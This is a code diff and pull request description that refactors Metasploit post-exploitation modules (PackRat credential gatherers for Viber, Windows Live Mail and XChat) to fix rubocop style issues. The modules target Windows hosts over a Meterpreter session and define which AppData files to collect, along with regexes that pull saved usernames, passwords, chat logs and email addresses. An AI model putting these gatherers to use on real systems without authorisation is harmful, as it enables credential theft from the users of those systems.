-                              "description": "Collects all images of contacts and sent recieved",
-                              "credential_type": "image"
-                            }
-                          ]
-                        }
-          ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Viber credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for credentials in Viber desktop application on a windows remote host. Viber is a cross-platform voice over IP and instant messaging software application.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Kazuyoshi Maruta',
+            'Daniel Hallsworth',
+            'Barwar Salim M',
+            'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
+          ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -68,8 +77,9 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:'gatherable_artifacts'].map { |k| k[:'filetypes'] }.uniq.unshift('All')])
-      ])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+      ]
+    )
   end
 
   def run
@@ -80,11 +90,9 @@ class MetasploitModule < Msf::Post
 
     # used to grab files for each user on the remote host
     grab_user_profiles.each do |userprofile|
-      run_packrat(userprofile, module_info['artifacts'])
-
+      run_packrat(userprofile, ARTIFACTS)
     end
 
     print_status 'PackRat credential sweep Completed'
   end
 end
-

--- a/modules/post/windows/gather/credentials/windowslivemail.rb
+++ b/modules/post/windows/gather/credentials/windowslivemail.rb
@@ -79,7 +79,7 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
       ]
     )
   end

--- a/modules/post/windows/gather/credentials/windowslivemail.rb
+++ b/modules/post/windows/gather/credentials/windowslivemail.rb
@@ -10,59 +10,68 @@ class MetasploitModule < Msf::Post
   include Msf::Post::Windows::UserProfiles
   include Msf::Post::Windows::Packrat
 
+  ARTIFACTS =
+    {
+      application: 'windowlivemail',
+      app_category: 'emails',
+      gatherable_artifacts: [
+        {
+          filetypes: 'logins',
+          path: 'AppData',
+          dir: 'Microsoft',
+          artifact_file_name: '*.oeaccount',
+          description: "Windows Live Mail's saved Username and Password",
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:password.*)',
+                '(?i-mx:username.*)'
+              ]
+            },
+            {
+              extraction_description: 'searches for Email TO/FROM address',
+              extraction_type: 'Email addresses',
+              regex: [
+                '(?i-mx:to:.*)',
+                '(?i-mx:from:.*)'
+              ]
+            }
+          ]
+        }
+      ]
+    }.freeze
+
   def initialize(info = {})
-    super(update_info(info,
-                      'Name' => 'Windows Live Mail credential gatherer',
-                      'Description' => %q{
-                      PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
-      PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
-      Further details can be found in the module documentation.
-      This is a module that searches for Windows Live Mail credentials on a windows remote host.
-      },
-                      'License' => MSF_LICENSE,
-                      'Author' =>
-                        [
-                          'Kazuyoshi Maruta',
-                          'Daniel Hallsworth',
-                          'Barwar Salim M',
-                          'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
-                        ],
-                      'Platform' => ['win'],
-                      'SessionTypes' => ['meterpreter'],
-                      'artifacts' =>
-                        {
-                          "application": "windowlivemail",
-                          "app_category": "emails",
-                          "gatherable_artifacts": [
-                            {
-                              "filetypes": "logins",
-                              "path": "AppData",
-                              "dir": "Microsoft",
-                              "artifact_file_name": "*.oeaccount",
-                              "description": "Windows Live Mail's saved Username and Password",
-                              "credential_type": "text",
-                              "regex_search": [
-                                {
-                                  "extraction_description": "Searches for credentials (USERNAMES/PASSWORDS)",
-                                  "extraction_type": "credentials",
-                                  "regex": [
-                                    "(?i-mx:password.*)",
-                                    "(?i-mx:username.*)"
-                                  ]
-                                },
-                                {
-                                  "extraction_description": "searches for Email TO/FROM address",
-                                  "extraction_type": "Email addresses",
-                                  "regex": [
-                                    "(?i-mx:to:.*)",
-                                    "(?i-mx:from:.*)"
-                                  ]
-                                }
-                              ]
-                            }
-                          ]
-                        }
-          ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Live Mail credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for Windows Live Mail credentials on a windows remote host.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Kazuyoshi Maruta',
+            'Daniel Hallsworth',
+            'Barwar Salim M',
+            'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
+          ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -70,8 +79,9 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:'gatherable_artifacts'].map { |k| k[:'filetypes'] }.uniq.unshift('All')])
-      ])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+      ]
+    )
   end
 
   def run
@@ -82,11 +92,9 @@ class MetasploitModule < Msf::Post
 
     # used to grab files for each user on the remote host
     grab_user_profiles.each do |userprofile|
-      run_packrat(userprofile, module_info['artifacts'])
-
+      run_packrat(userprofile, ARTIFACTS)
     end
 
     print_status 'PackRat credential sweep Completed'
   end
 end
-

--- a/modules/post/windows/gather/credentials/xchat.rb
+++ b/modules/post/windows/gather/credentials/xchat.rb
@@ -79,7 +79,7 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
       ]
     )
   end

--- a/modules/post/windows/gather/credentials/xchat.rb
+++ b/modules/post/windows/gather/credentials/xchat.rb
@@ -10,59 +10,68 @@ class MetasploitModule < Msf::Post
   include Msf::Post::Windows::UserProfiles
   include Msf::Post::Windows::Packrat
 
+  ARTIFACTS =
+    {
+      application: 'xchat',
+      app_category: 'chats',
+      gatherable_artifacts: [
+        {
+          filetypes: 'chat_logs',
+          path: 'AppData',
+          dir: 'X-Chat 2',
+          artifact_file_name: '*.txt',
+          description: 'Collects all chatting conversations of sent and recieved',
+          credential_type: 'text',
+          regex_search: [
+            {
+              extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
+              extraction_type: 'credentials',
+              regex: [
+                '(?i-mx:password.*)',
+                '(?i-mx:username.*)'
+              ]
+            },
+            {
+              extraction_description: 'searches for Email TO/FROM address',
+              extraction_type: 'Email addresses',
+              regex: [
+                '(?i-mx:to:.*)',
+                '(?i-mx:from:.*)'
+              ]
+            }
+          ]
+        }
+      ]
+    }.freeze
+
   def initialize(info = {})
-    super(update_info(info,
-                      'Name' => 'Xchat credential gatherer',
-                      'Description' => %q{
-                      PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
-      PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
-      Further details can be found in the module documentation.
-      This is a module that searches for Xchat credentials on a windows remote host. XChat is an IRC chat program for both Linux and Windows.
-      },
-                      'License' => MSF_LICENSE,
-                      'Author' =>
-                        [
-                          'Kazuyoshi Maruta',
-                          'Daniel Hallsworth',
-                          'Barwar Salim M',
-                          'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
-                        ],
-                      'Platform' => ['win'],
-                      'SessionTypes' => ['meterpreter'],
-                      'artifacts' =>
-                        {
-                          "application": "xchat",
-                          "app_category": "chats",
-                          "gatherable_artifacts": [
-                            {
-                              "filetypes": "chat_logs",
-                              "path": "AppData",
-                              "dir": "X-Chat 2",
-                              "artifact_file_name": "*.txt",
-                              "description": "Collects all chatting conversations of sent and recieved",
-                              "credential_type": "text",
-                              "regex_search": [
-                                {
-                                  "extraction_description": "Searches for credentials (USERNAMES/PASSWORDS)",
-                                  "extraction_type": "credentials",
-                                  "regex": [
-                                    "(?i-mx:password.*)",
-                                    "(?i-mx:username.*)"
-                                  ]
-                                },
-                                {
-                                  "extraction_description": "searches for Email TO/FROM address",
-                                  "extraction_type": "Email addresses",
-                                  "regex": [
-                                    "(?i-mx:to:.*)",
-                                    "(?i-mx:from:.*)"
-                                  ]
-                                }
-                              ]
-                            }
-                          ]
-                        }
-          ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Xchat credential gatherer',
+        'Description' => %q{
+          PackRat is a post-exploitation module that gathers file and information artifacts from end users' systems.
+          PackRat searches for and downloads files of interest (such as config files, and received and deleted emails) and extracts information (such as contacts and usernames and passwords), using regexp, JSON, XML, and SQLite queries.
+          Further details can be found in the module documentation.
+          This is a module that searches for Xchat credentials on a windows remote host. XChat is an IRC chat program for both Linux and Windows.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Kazuyoshi Maruta',
+            'Daniel Hallsworth',
+            'Barwar Salim M',
+            'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
+          ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -70,8 +79,9 @@ class MetasploitModule < Msf::Post
         OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
         OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
         # enumerates the options based on the artifacts that are defined below
-        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:'gatherable_artifacts'].map { |k| k[:'filetypes'] }.uniq.unshift('All')])
-      ])
+        OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', module_info['artifacts'][:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
+      ]
+    )
   end
 
   def run
@@ -82,11 +92,9 @@ class MetasploitModule < Msf::Post
 
     # used to grab files for each user on the remote host
     grab_user_profiles.each do |userprofile|
-      run_packrat(userprofile, module_info['artifacts'])
-
+      run_packrat(userprofile, ARTIFACTS)
     end
 
     print_status 'PackRat credential sweep Completed'
   end
 end
-


### PR DESCRIPTION
Here are some fixes for the rubocop issues.  We moved the artifacts from the info hash because it caused one of the modules to break the length requirements on rubocop and also, that information did not need to live in the module cache.
Let me know if all this makes sense.